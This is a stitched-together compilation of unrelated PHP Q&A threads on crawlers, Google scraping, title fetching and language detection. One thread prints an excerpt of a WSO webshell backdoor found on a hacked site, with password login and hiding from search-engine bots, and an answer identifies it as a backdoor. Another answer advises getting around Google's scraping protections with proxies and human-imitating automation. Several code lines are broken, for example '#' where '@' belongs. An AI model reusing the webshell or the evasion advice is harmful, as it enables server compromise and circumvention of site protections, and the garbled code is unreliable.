I am currently developing a web crawler in PHP. It is still a simple one, but what I want to know is: how can I make my crawler crawl pages in the background without using my bandwidth? Do I have to use cron jobs? I also want it to store the data in a database automatically.
Here is what I have done:
<?php
$conn = mysqli_connect("localhost","root","","crawler") or die(mysqli_connect_error());
ini_set('max_execution_time', 4000);
$to_crawl = "http://hootpile.com";
$c = array();
function get_links($url){
global $c;
$input = file_get_contents($url);
$regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
preg_match_all("/$regexp/siU", $input, $matches);
$base_url = parse_url($url, PHP_URL_HOST);
$l = $matches[2];
foreach($l as $link) {
if(strpos($link, "#")) {
$link = substr($link,0, strpos($link, "#"));
}
if(substr($link,0,1) == ".") {
$link = substr($link, 1);
}
if(substr($link,0,7)=="http://") {
$link = $link;
}
else if(substr($link,0,8) =="https://") {
$link = $link;
}
else if(substr($link,0,2) =="//") {
$link = substr($link, 2);
}
else if(substr($link,0,2) =="#") {
$link = $url;
}
else if(substr($link,0,2) =="mailto:") {
$link = "[".$link."]";
}
else {
if(substr($link,0,1) != "/") {
$link = $base_url."/".$link;
}
else {
$link = $base_url.$link;
}
}
if(substr($link, 0, 7)=="http://" && substr($link, 0, 8)!="https://" && substr($link, 0, 1)=="[") {
if(substr($url, 0, 8) == "https://") {
$link = "https://".$link;
}
else {
$link = "http://".$link;
}
}
//echo $link."<br />";
if(!in_array($link,$c)) {
array_push($c,$link);
}
}
}
get_links($to_crawl);
foreach ($c as $page) {
get_links($page);
}
foreach ($c as $page) {
$page = mysqli_real_escape_string($conn, $page); // escape before building the query
$query = mysqli_query($conn,"INSERT INTO LINKS VALUES('','$page')");
echo $page."<br />";
}
?>
You can use Simple HTML DOM, but crawling/scraping depends on the web page structure and on how much data you want to store. You may not find the same data and structure on different websites, so you should write some common code that extracts the data you need from the scraped pages.
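For example, a minimal sketch with Simple HTML DOM (this assumes you have downloaded simple_html_dom.php into the same directory; the target URL is just the one from the question):
include('simple_html_dom.php'); // single-file library providing file_get_html()

$html = file_get_html('http://hootpile.com');
if($html && is_object($html)) {
    foreach($html->find('a') as $element) {
        // anchor attributes are exposed as object properties
        echo $element->href . "<br />";
    }
    $html->clear(); // free the parsed DOM to keep memory usage down
}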
You can use ReactPHP, since it allows you to easily spawn a process that keeps running.
You can also write a shebang (hashbang) at the very beginning of the file:
#!/usr/bin/php
give execution permissions to the file:
chmod a+x your_script_path.php
and execute it with cron or with nohup. If you want to daemonize it, then there is a little more work.
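For example, a minimal sketch of both options (the paths below are assumptions; point them at wherever your script actually lives):
# crontab -e : run the crawler every hour and append its output to a log
0 * * * * /usr/bin/php /var/www/crawler/your_script_path.php >> /var/log/crawler.log 2>&1

# or start it once in the background so it keeps running after you log out
nohup php /var/www/crawler/your_script_path.php > crawler.log 2>&1 &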
I think you should not use PHP for a crawler/scraper because it is not designed for long-running tasks. It will cause memory usage problems; use Python instead (I use Python + BeautifulSoup + urllib for scraping).
Besides, you should use crontab and nohup to schedule background jobs.
I have limited the crawl to a single website. I have also tried to use the function linkExists to stop crawling links that already exist, but the script doesn't stop until it times out. How can I fix that?
I am quite happy to stop the script at a fixed number of loops.
I have been doing a course online on building a search engine and have made a few changes to the original script because I found it to be a little inefficient, yet the main problem still occurs.
There is a problem within the function linkExists that I am also trying to solve. The original script uses linkExists at the point of inserting into the database, and I want to exclude existing links before crawling.
function LinkExists($url) {
global $con;
$query = $con->prepare("SELECT url FROM sites WHERE url = :url");
$query->bindParam(":url",$url);
$query->execute();
// fetchColumn() takes a column index and returns false when no row matched
$indata = $query->fetchColumn(0);
return $query->rowCount() != 0;
}
function followLinks($url) {
global $alreadyCrawled;
global $crawling;
global $hosta;
global $indata;
$parser = new DomDocumentParser($url);
$linkList = $parser->getLinks();
foreach($linkList as $link) {
$href = $link->getAttribute("href");
if((substr($href, 0, 3) !== "../") AND (strpos($href, $hosta) === false)) {
continue;
}
else if(strpos($href, "#") !== false) {
continue;
}
else if(substr($href, 0, 11) == "javascript:") {
continue;
}
$href = createLink($href, $url);
// skip links that are already stored in the database (LinkExists returns a boolean)
if(LinkExists($href)) {
$alreadyCrawled[] = $href;
continue;
}
if(!in_array($href, $alreadyCrawled)) {
$alreadyCrawled[] = $href;
$crawling[] = $href;
getDetails($href);
}
}
array_shift($crawling);
foreach($crawling as $site) {
followLinks($site);
}
}
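One way to make the crawl stop at a fixed number of loops is to drop the recursion and work through a queue with a hard cap, checking LinkExists before a link is crawled rather than at insert time. Below is a sketch that reuses the helpers from the script above (DomDocumentParser, createLink, getDetails, LinkExists); MAX_PAGES is a hypothetical limit and the javascript:/# filtering is omitted for brevity:
define('MAX_PAGES', 500); // hypothetical cap on how many pages to collect

// iterative alternative to the recursive followLinks(): work through a queue
// until it is empty or the cap is reached, skipping links already in the database
function crawlSite($startUrl) {
    global $alreadyCrawled;
    $queue = array($startUrl);
    while(!empty($queue) && count($alreadyCrawled) < MAX_PAGES) {
        $url = array_shift($queue);
        $parser = new DomDocumentParser($url);
        foreach($parser->getLinks() as $link) {
            $href = createLink($link->getAttribute("href"), $url);
            if(in_array($href, $alreadyCrawled) || LinkExists($href)) {
                continue; // already seen in this run or already stored in the database
            }
            $alreadyCrawled[] = $href;
            $queue[] = $href;
            getDetails($href);
        }
    }
}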
I would like to scrape the Google search results up to page 2, but I am having trouble: my page either comes back blank or times out.
for($j=0; $j<$acount; $j++){
sleep(60);
for($sp = 0; $sp <= 10; $sp+=10){
$url = 'http://www.google.'.$lang.'/search?q='.$in.'&start='.$sp;
if($sp == 10){
$datenbank = "proxy_work.php";
$datei = fopen($datenbank,"a+");
fwrite($datei, $data);
fwrite ($datei,"\r\n");
fclose($datei);
} else {
$datenbank = "proxy_work.php";
$datei = fopen($datenbank,"w+");
fwrite($datei, $data);
fwrite ($datei,"\r\n");
fclose($datei);
}
}
$html = file_get_html("proxy_work.php");
foreach($html->find('a') as $e){
// $title = $h3->innertext;
$link = $e->href;
if(in_array($endomain, $approveurl)){
}
// if it is not a direct link but url reference found inside it, then extract
if (!preg_match('/^https?/', $link) && preg_match('/q=(.+)&sa=/U', $link, $matches) && preg_match('/^https?/', $matches[1])) {
$link = $matches[1];
} else if (!preg_match('/^https?/', $link)) { // skip if it is not a valid link
continue;
}
}
}
Google search result pages (SERPs) are not like a common website with static HTML. Google protects its data from web scraping. Treat it like a business directory and consider the following tips for scraping business directories:
IP-proxying.
Imitating human behaviour by using some browser automation tools (Selenium, iMacros and others).
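If you keep parsing the raw result HTML anyway, note that the anchors Google returns are usually redirect links of the form /url?q=<target>&sa=..., which is what the q=(.+)&sa= regex above is trying to unwrap. A slightly more robust sketch using PHP's own query-string parsing (the sample link is purely illustrative):
// unwrap a Google redirect link such as /url?q=https://example.com/page&sa=U
function extractTargetUrl($googleHref) {
    $query = parse_url($googleHref, PHP_URL_QUERY); // everything after the "?"
    if(empty($query)) {
        return $googleHref; // nothing to unwrap
    }
    parse_str($query, $params); // also URL-decodes the values
    return isset($params['q']) ? $params['q'] : $googleHref;
}

echo extractTargetUrl('/url?q=https://example.com/page&sa=U'); // https://example.com/page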
A website was hacked and I found a strange new PHP file on it. I have already deleted all the files and the database before changing the hosting credentials, but I would like to know what else I should double-check before going back live with a backup.
Are there any other extra measures to be taken for the future - as in: how do I find out how it got there?
Here is a piece of the code, plus a pastebin link since the full code is too long:
<?php
$auth_pass = "fadf17141f3f9c3389d10d09db99f757";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
#ini_set('error_log',NULL);
#ini_set('log_errors',0);
#ini_set('max_execution_time',0);
#set_time_limit(0);
#set_magic_quotes_runtime(0);
#define('WSO_VERSION', '2.5.1');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
$os = 'win';
else
$os = 'nix';
$safe_mode = #ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = #ini_get('disable_functions');
$home_cwd = #getcwd();
if(isset($_POST['c']))
#chdir($_POST['c']);
$cwd = #getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
https://pastebin.com/J37Xvk9v
This is a backdoor. Hackers can access this page (PHP file) to enter commands on your server. This way they can hack you again even after you change your password.
Always delete such files, and be aware that the attacker may have hidden more pages like this one.
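Since attackers rarely drop just one file, one extra check before restoring a backup is to scan the whole document root for the usual webshell fingerprints (FilesMan, eval/base64_decode chains and so on). A minimal sketch; the path and the signature list are assumptions, not an exhaustive scanner:
$root = '/var/www/html'; // adjust to your web root
$signatures = array('FilesMan', 'eval(base64_decode', 'gzinflate(base64_decode', '$auth_pass');

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
foreach($files as $file) {
    if(!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
        continue;
    }
    $contents = file_get_contents($file->getPathname());
    foreach($signatures as $sig) {
        if(strpos($contents, $sig) !== false) {
            echo $file->getPathname() . " matches '" . $sig . "'\n";
            break; // one hit is enough to flag the file
        }
    }
}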
I'm trying to get the title of a website that is entered by the user.
Text input: the website link entered by the user is sent to the server via AJAX.
The user can input anything: an actual existing link, or just a single word, or something weird like 'po392#*#8'.
Here is a part of my PHP script:
// Make sure the url is on another host
if(substr($url, 0, 7) !== "http://" AND substr($url, 0, 8) !== "https://") {
$url = "http://".$url;
}
// Extra confirmation for security
if (filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_HOST_REQUIRED)) {
$urlIsValid = "1";
} else {
$urlIsValid = "0";
}
// Make sure there is a dot in the url
if (strpos($url, '.') !== false) {
$urlIsValid = "1";
} else {
$urlIsValid = "0";
}
// Retrieve title if no title is entered
if($title == "" AND $urlIsValid == "1") {
function get_http_response_code($theURL) {
$headers = get_headers($theURL);
if($headers) {
return substr($headers[0], 9, 3);
} else {
return 'error';
}
}
if(get_http_response_code($url) != "200") {
$urlIsValid = "0";
} else {
$file = file_get_contents($url);
$res = preg_match("/<title>(.*)<\/title>/siU", $file, $title_matches);
if($res === 1) {
$title = preg_replace('/\s+/', ' ', $title_matches[1]);
$title = trim($title);
$title = addslashes($title);
}
// If title is still empty, make title the url
if($title == "") {
$title = $url;
}
}
}
However, there are still errors occurring in this script.
It works perfectly when an existing URL such as 'https://www.youtube.com/watch?v=eB1HfI-nIRg' is entered, and also when a non-existing page such as 'https://www.youtube.com/watch?v=NON-EXISTING' is entered, but it doesn't work when the user enters something like 'twitter.com' (without http) or something like 'yikes'.
I tried literally everything: cURL, DOMDocument...
The problem is that when an invalid link is entered, the AJAX call never completes (it keeps loading), while it should set $urlIsValid = "0" whenever an error occurs.
I hope someone can help me - it's appreciated.
Nathan
You have a relatively simple problem but your solution is too complex and also buggy.
These are the problems that I've identified with your code:
// Make sure the url is on another host
if(substr($url, 0, 7) !== "http://" AND substr($url, 0, 8) !== "https://") {
$url = "http://".$url;
}
This does not actually ensure that the URL is on another host (it could still be localhost, for example). You should remove this code.
// Make sure there is a dot in the url
if (strpos($url, '.') !== false) {
$urlIsValid = "1";
} else {
$urlIsValid = "0";
}
This code overwrites the code above it, where you validate that the string is indeed a valid URL, so remove it.
The definition of the additional function get_http_response_code is pointless. You could use only file_get_contents to get the HTML of the remote page and check it against false to detect the error.
Also, from your code I conclude that if the (external to this context) variable $title is not empty, then you never execute any external fetch at all, so why not check that condition first?
To sum it up, your code should look something like this:
if('' === $title && filter_var($url, FILTER_VALIDATE_URL))
{
//# means we suppress warnings as we won't need them
//this could be done with error_reporting(0) or similar side-effect method
$html = getContentsFromUrl($url);
if(false !== $html && preg_match("/<title>(.*)<\/title>/siU", $html, $title_matches))
{
$title = preg_replace('/\s+/', ' ', $title_matches[1]);
$title = trim($title);
$title = addslashes($title);
}
// If title is still empty, make title the url
if($title == "") {
$title = $url;
}
}
function getContentsFromUrl($url)
{
//if not full/complete url
if(!preg_match('#^https?://#ims', $url))
{
$completeUrl = 'http://' . $url;
$result = #file_get_contents($completeUrl);
if(false !== $result)
{
return $result;
}
//we try with https://
$url = 'https://' . $url;
}
return #file_get_contents($url);
}
I am building a search engine and web crawler using PHP, and I would like to detect the language of a website. How would I detect the language of a page by:
Checking the URL for https://twitter.com/?lang=jap
If that is not set, then I would like to:
Check the URL https://www.google.co.jp/
If I still can't find anything, then I would like to default to English.
The code I have so far for scraping pages is:
function crawl($url){
global $weblinks; // declare the global before its first use
$html = file_get_html($url);
if($html && is_object($html) && isset($html->nodes)){
$weblinks[]=$url;
foreach($html->find('a') as $element) {
$link = $element->href;
$base_url = parse_url($url, PHP_URL_HOST);
if(substr($link,0,7)=="http://"){
$link = $link;
}else if(substr($link,0,8)=="https://"){
$link = $link;
}else if(substr($link,0,2)=="//"){
$link = substr($link, 2);
}else if(substr($link,0,1)=="#"){
$link = $html;
}else if(substr($link,0,7)=="mailto:"){
$link = "";
}else if(substr($link,0,11)=="javascript:"){
$link = "";
}else{
if(substr($link, 0, 1) != "/"){
$link = $base_url."/".$link;
}else{
$link = $base_url . $link;
}
}
if(substr($link, 0, 7) != "http://" && substr($link, 0, 8) != "https://" && $link != ""){
if(substr($url, 0, 8) == "https://"){
$link = "https://".$link;
}else{
$link = "http://".$link;
}
}
if(!in_array($link, $weblinks)){
$weblinks[]=$link;
}
}
$html->clear();
}else{
}
}
function info($weblinks){
foreach($weblinks as $link) {
$linkhtml = file_get_html("$link");
if($linkhtml && is_object($linkhtml) && isset($linkhtml->nodes)){
$titleraw = $linkhtml->find('title',0);
$title = $titleraw->innertext;
$des = $linkhtml->find("meta[name='description']",0)->content;
//detect language here
echo "<tr><td>".$title."</td><td>".$link."</td><td>".$des."</td></tr>";
$sql = mysql_query("INSERT into web once");
$title = "";
$des = "";
$linkhtml->clear();
}
}
}
To get the language from ?lang=:
$url = 'www.domain.org?lang=IT';
$url_parts = parse_url($url);
parse_str($url_parts['query'], $query_params); // parse_url() exposes the query string under 'query'
$lang = isset($query_params['lang']) ? $query_params['lang'] : '';
You should then validate this with a switch/case statement and a list of languages that you support, like this:
switch ($lang) {
case 'EN':
//language is English
break;
case 'IT':
//language is Italian
break;
case 'FR':
//language is French
break;
default:
//?lang query was empty, or contained an unsupported language
$lang = FALSE;
} //end switch
After that, you can use this logic to determine whether you need to check the URL for the language:
if ($lang == FALSE) {
//code to determine language from TLD
}
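For the TLD fallback, here is a minimal sketch with a small hand-maintained map (the list of TLDs and language codes is just illustrative):
function langFromTld($url) {
    $host = parse_url($url, PHP_URL_HOST);
    if(empty($host)) {
        $host = $url; // parse_url needs a scheme to pick out the host reliably
    }
    // illustrative map only; extend it for the markets you care about
    $tldToLang = array('jp' => 'JA', 'it' => 'IT', 'fr' => 'FR', 'de' => 'DE');
    $parts = explode('.', $host);
    $tld = strtolower(end($parts));
    return isset($tldToLang[$tld]) ? $tldToLang[$tld] : FALSE;
}

if ($lang == FALSE) {
    $lang = langFromTld($url); // still FALSE if the TLD tells us nothing
}
if ($lang == FALSE) {
    $lang = 'EN'; // final fallback, as you described
}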
Hopefully this will help get you started, although this is a big can of worms you're opening up. There are other things you need to check in order to be certain of the language of a website in addition to what you've mentioned. One of them is the language meta tag, which is like this: <meta name="language" content="english"> and goes in the head of the webpage, though not all websites use it.
Some multilingual websites, like mine, use a subdomain like http://it.website.com or http://fr.website.com
Others use query strings that are different from ?lang=. So you'll need to do a significant amount of research to cover all your bases.
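If you also want to honour the language meta tag (or the lang attribute on the html element), a rough regex-based sketch is below; regexes over HTML are brittle, so treat it only as a starting point:
function langFromHtml($html) {
    // e.g. <html lang="ja"> or <html lang="en-GB">
    if(preg_match('/<html[^>]*\blang=["\']?([a-zA-Z-]+)/i', $html, $m)) {
        return strtoupper(substr($m[1], 0, 2));
    }
    // e.g. <meta name="language" content="english">
    if(preg_match('/<meta[^>]*name=["\']language["\'][^>]*content=["\']?([a-zA-Z -]+)/i', $html, $m)) {
        return trim($m[1]); // raw value such as "english"; map it to a code yourself
    }
    return FALSE;
}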